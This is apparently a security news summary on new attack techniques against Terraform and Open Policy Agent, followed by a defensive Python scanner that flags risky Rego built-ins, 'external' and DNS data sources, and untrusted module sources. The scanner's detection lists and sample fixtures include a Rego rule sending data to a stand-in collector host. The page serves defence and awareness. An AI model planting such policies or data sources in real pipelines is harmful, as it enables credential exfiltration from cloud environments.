New Attack Techniques Exploit Terraform and Open Policy Agent Vulnerabilities
2024-11-26
Need some FUD? Learn about the vulnerabilities in IaC and PaC tools like Terraform and OPA, and how they expose cloud platforms to new attack vectors.
The article discusses newly discovered attack techniques targeting Infrastructure-as-Code (IaC) and Policy-as-Code (PaC) tools like Terraform and Open Policy Agent (OPA). These tools, which utilize domain-specific languages, are typically seen as secure but have vulnerabilities that can be exploited. An attacker can compromise OPA by inserting malicious policies to exfiltrate data using functions like "http.send" or "net.lookup_ip_addr." Terraform is also vulnerable as attackers can manipulate GitHub workflows through unreviewed changes in pull requests, using malicious data sources to achieve their goals. The article emphasizes the need for using trusted third-party components to mitigate these risks.
Supply Chain, Git/Repo Breach, Weak or Compromised Credentials, Open Source
Terraform, Open Policy Agent, IaC vulnerabilities, PaC vulnerabilities, data exfiltration, DNS tunneling
N/A
Terraform, Open Policy Agent
New Attack Techniques Target IaC and PaC Tools

Recent discoveries have unveiled new attack techniques against Infrastructure-as-Code (IaC) and Policy-as-Code (PaC) tools, notably HashiCorp's Terraform and Styra's Open Policy Agent (OPA). These tools use domain-specific languages (DSLs) that are designed to be safer than general-purpose programming languages, yet they are not impervious to attack.

Vulnerabilities in Open Policy Agent (OPA)

OPA is an open-source policy engine that enforces policies in cloud-native environments such as microservices, CI/CD pipelines, and Kubernetes. Policies are written in a query language called Rego. A new attack method compromises the supply chain by inserting a malicious Rego policy into an OPA server through unauthorized access. The malicious policy then runs as part of normal policy evaluation and enables harmful actions, such as credential exfiltration, using the built-in "http.send" function. Even if "http.send" is restricted, attackers can use the "net.lookup_ip_addr" function for DNS tunneling, which still allows data to be exfiltrated. It is therefore advisable to monitor and restrict these functions in OPA policies to mitigate such risks.

Exploiting Terraform's IaC Platform

Terraform simplifies cloud resource management through code-based configurations written in HashiCorp Configuration Language (HCL). Attackers can abuse the "terraform plan" command, which is often triggered as part of GitHub "pull_request" workflows: unreviewed changes containing malicious data sources are evaluated during the CI/CD run, before any review. External attackers (in public repositories) or malicious insiders (in private repositories) can therefore use pull requests to achieve their objectives. Such data sources may include rogue external data sources, Terraform modules from registries, or DNS data sources. It is crucial to ensure that only third-party components from trusted sources are used to prevent these exploits.
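Both mitigations the summary recommends, restricting the OPA built-ins and refusing untrusted data sources and modules in Terraform, can be checked in the repository before a policy bundle is loaded or "terraform plan" runs in a pull_request workflow. The Python script below is an added example written for this page; it is not code from the article, HashiCorp, or Styra. It scans Rego files for calls to http.send and net.lookup_ip_addr, and HCL files for "external" and DNS-provider ("dns_"-prefixed) data sources and for module sources outside an allowlist. The trusted-source prefixes (local paths plus a hypothetical private registry), the "dns_" prefix match, the sample files, and the ".invalid" hostnames are all assumptions or constructed fixtures.

```python
"""Pre-merge guard for the two risks described above (added example, not from the article)."""
from __future__ import annotations

import re
import sys
from dataclasses import dataclass

# Rego built-ins the summary says to monitor and restrict.
RESTRICTED_REGO_BUILTINS = ("http.send", "net.lookup_ip_addr")
# Data source types that do work during `plan`; the "dns_" prefix match is an assumption.
RISKY_TF_DATA_PREFIXES = ("external", "dns_")
# Allowlisted module sources: local paths plus a hypothetical private registry.
TRUSTED_MODULE_PREFIXES = ("./", "../", "registry.example.internal/")


@dataclass
class Finding:
    path: str
    line: int
    message: str


def _strip_comment(line: str) -> str:
    """Drop a '#' line comment (valid in Rego and HCL), ignoring '#' inside strings."""
    in_str = False
    for i, ch in enumerate(line):
        if ch == '"' and (i == 0 or line[i - 1] != "\\"):
            in_str = not in_str
        elif ch == "#" and not in_str:
            return line[:i]
    return line


def scan_rego(path: str, text: str) -> list[Finding]:
    """Flag each call `name(` of a restricted built-in outside comments."""
    findings = []
    for n, raw in enumerate(text.splitlines(), 1):
        line = _strip_comment(raw)
        for builtin in RESTRICTED_REGO_BUILTINS:
            if re.search(r"(?<![\w.])" + re.escape(builtin) + r"\s*\(", line):
                findings.append(Finding(path, n, f"restricted built-in {builtin} called"))
    return findings


DATA_RE = re.compile(r'^\s*data\s+"([^"]+)"\s+"([^"]+)"\s*\{')
MODULE_RE = re.compile(r'^\s*module\s+"([^"]+)"\s*\{')
SOURCE_RE = re.compile(r'^\s*source\s*=\s*"([^"]+)"')


def scan_hcl(path: str, text: str) -> list[Finding]:
    """Flag risky data sources and untrusted module sources; nesting is tracked by brace count."""
    findings = []
    depth = 0
    module = None  # name of the top-level module block we are inside, if any
    for n, raw in enumerate(text.splitlines(), 1):
        line = _strip_comment(raw)
        m = DATA_RE.match(line)
        if m and m.group(1).startswith(RISKY_TF_DATA_PREFIXES):
            findings.append(Finding(path, n, f'data "{m.group(1)}" "{m.group(2)}" executes during plan'))
        m = MODULE_RE.match(line)
        if m and depth == 0:
            module = m.group(1)
        s = SOURCE_RE.match(line)
        if module and s and not s.group(1).startswith(TRUSTED_MODULE_PREFIXES):
            findings.append(Finding(path, n, f'module "{module}" has untrusted source {s.group(1)}'))
        depth += line.count("{") - line.count("}")
        if depth == 0:
            module = None
    return findings


def scan(files: dict[str, str]) -> list[Finding]:
    """Dispatch on file extension; `files` maps path -> contents (read from the checkout in CI)."""
    findings: list[Finding] = []
    for path, text in files.items():
        if path.endswith(".rego"):
            findings.extend(scan_rego(path, text))
        elif path.endswith(".tf"):
            findings.extend(scan_hcl(path, text))
    return findings


# Constructed fixtures, not taken from the article; hostnames use the reserved .invalid TLD.
SAMPLE_FILES = {
    "policy/authz.rego": '''package authz
default allow = false
allow { input.user == "admin" }
# (a commented-out http.send(...) is ignored)
leak { http.send({"method": "POST", "url": "https://collector.invalid/"}) }
probe { net.lookup_ip_addr("probe.invalid") }
''',
    "infra/main.tf": '''module "vpc" {
  source = "./modules/vpc"
}
module "helper" {
  source = "git::https://github.invalid/someone/helper.git"
}
data "external" "env" {
  program = ["python3", "helper.py"]
}
data "dns_a_record_set" "probe" {
  host = "probe.invalid"
}
''',
}

if __name__ == "__main__":
    found = scan(SAMPLE_FILES)
    for f in found:
        print(f"{f.path}:{f.line}: {f.message}")
    sys.exit(1 if found else 0)  # a non-zero exit blocks the merge in CI
```

Run it as a required status check on pull requests so that a change introducing one of these constructs fails before "terraform plan" executes or the policy bundle is published. It is a review-time complement, not a replacement, for server-side controls such as OPA's capabilities file, which can remove built-ins from what loaded policies may compile against.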
https://thehackernews.com/2024/11/cybersecurity-flaws-in-iac-and-pac.html?m=1